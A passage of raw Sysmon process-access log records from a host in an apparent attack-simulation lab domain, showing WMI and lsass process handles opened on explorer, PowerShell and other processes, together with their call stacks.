ystem32\RPCRT4.dll+111bc 10341000x80000000000000002240372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240356Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240355Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240354Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240353Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240352Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 